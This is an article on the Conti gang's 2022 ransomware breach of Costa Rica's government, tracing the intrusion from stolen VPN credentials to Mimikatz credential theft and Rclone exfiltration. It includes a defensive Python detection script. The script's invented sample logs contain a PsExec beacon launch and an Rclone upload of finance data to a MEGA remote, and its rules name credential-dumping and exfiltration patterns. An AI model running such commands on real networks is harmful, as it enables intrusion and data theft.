More details are now available about the Conti ransomware gang's breach of the Costa Rican government. The new information shows the attack's precision and the speed with which the intruders moved from initial access to the final stage of encrypting devices. This was the last attack by the Conti ransomware operation before the group transitioned to a different organizational form that relies on multiple cells working with other gangs.
Conti emerged in 2020 and quickly made an impact by attacking both private and public sector organizations, including local governments, US schools, and national healthcare systems. On April 11, 2022, Conti carried out a large-scale attack on the Costa Rican government that crippled the government's networks.
“A report from cyber intelligence company Advanced Intelligence (AdvIntel) details the Russian hackers’ steps from initial foothold to exfiltrating 672GB of data on April 15 and executing the ransomware” (Bleeping Computer, 2022).
Conti actors breached Costa Rica’s Ministry of Finance for initial access. A group member who goes by “MemberX” gained access to a VPN connection using stolen credentials. The threat actors set up more than 10 Cobalt Strike beacons during the early stages of the attack. The VPN account was used to deploy encrypted forms of Cobalt Strike to evade detection.
“After gaining local network domain administrator access, the intruder used the Nltest command-line tool to enumerate domain trust relationships. Next, they scanned the network for file shares using ShareFinder and AdFind utilities” (Bleeping Computer, 2022). MemberX used Cobalt Strike backdoor channels to download the file-share enumeration output to a local machine. The attacker was able to access administrative shares, where they uploaded a Cobalt Strike DLL beacon and then ran it with the PsExec remote-execution tool.
Mimikatz was used post-exploitation to steal credentials. The malware collected login passwords and NTDS hashes for local users, including local admin, domain, and enterprise administrator hashes. “The researchers say that Conti operators leveraged Mimikatz to run a DCSync and Zerologon attack that gave them access to every host on Costa Rica’s interconnected networks” (Bleeping Computer, 2022). The Atera remote access tool was also installed on hosts for added persistence. “The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges” (AdvIntel).
Data was stolen using Rclone, a command-line program that can manage files on multiple cloud storage services. Conti used it specifically to upload data to the MEGA file hosting service.
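As an added illustration (not code from the AdvIntel report or the article), the following Python script applies simple command-line pattern rules for the stages described above (trust enumeration with Nltest, AdFind, PsExec remote execution, Rclone upload to MEGA) over constructed process-creation records and flags hosts where several stages of the chain appear together. Host names, user names and commands are invented.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (hypothetical hosts and users);
# not real logs from the Costa Rica incident.
SAMPLE_EVENTS = [
    {"host": "fin-ws01", "user": "corp\\memberx", "image": "nltest.exe",
     "cmd": "nltest /domain_trusts /all_trusts"},
    {"host": "fin-ws01", "user": "corp\\memberx", "image": "AdFind.exe",
     "cmd": "adfind.exe -f objectcategory=computer -csv"},
    {"host": "fin-ws01", "user": "corp\\memberx", "image": "PsExec.exe",
     "cmd": "psexec.exe \\\\fin-srv02 -s rundll32 beacon.dll,StartW"},
    {"host": "fin-srv02", "user": "corp\\svc-backup", "image": "rclone.exe",
     "cmd": "rclone copy D:\\finance mega:exfil --transfers 16"},
    {"host": "hr-ws07", "user": "corp\\alice", "image": "notepad.exe",
     "cmd": "notepad.exe budget.txt"},
]

# Each rule names one stage from the report and a narrow, case-insensitive
# command-line pattern; real deployments would tune these against baselines.
RULES = {
    "domain_trust_enumeration": re.compile(r"nltest(\.exe)?\s+.*domain_trusts", re.I),
    "ad_enumeration": re.compile(r"\badfind(\.exe)?\b", re.I),
    "remote_exec_psexec": re.compile(r"\bpsexec(\.exe)?\s+\\\\", re.I),
    "credential_dump": re.compile(r"sekurlsa|lsadump", re.I),
    "cloud_exfil_rclone": re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\bmega:", re.I),
}

def match_rules(events):
    """Return {host: set(rule_names)} for every rule that fires on that host."""
    hits = defaultdict(set)
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                hits[ev["host"]].add(name)
    return dict(hits)

def alerts(events, threshold=2):
    """Hosts on which at least `threshold` distinct chain stages fired."""
    hits = match_rules(events)
    return {host: sorted(rules) for host, rules in hits.items() if len(rules) >= threshold}

if __name__ == "__main__":
    for host, stages in alerts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

A single Rclone hit on fin-srv02 stays below the threshold; raising the threshold trades the single-stage exfiltration signal for fewer false positives, so exfiltration rules are usually alerted on separately.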
Conti posted its ransom demands on its leak site; the initial demand of $10 million was later raised to $20 million after Costa Rica refused to pay. While the public-facing website displayed the higher demands, internal communications obtained by AdvIntel showed that the actual negotiations were for less than $1 million.
Conti’s attack on the Costa Rican government relied on misconfigured administrative shares, which helped the attacker move to domain trusts. Costa Rica was forced to declare a national emergency on May 8, 2022, and some agencies didn’t recover services until early June.
After its internal communications were leaked and its source code was revealed, Conti shut down all sites used for negotiation and took its leak site offline. The cybercriminals have likely dispersed into other ransomware operations, including Quantum, Hive, AvosLocker, BlackCat, and HelloKitty. Conti has also been linked to Karakurt, BlackByte, and the Bazarcall collective.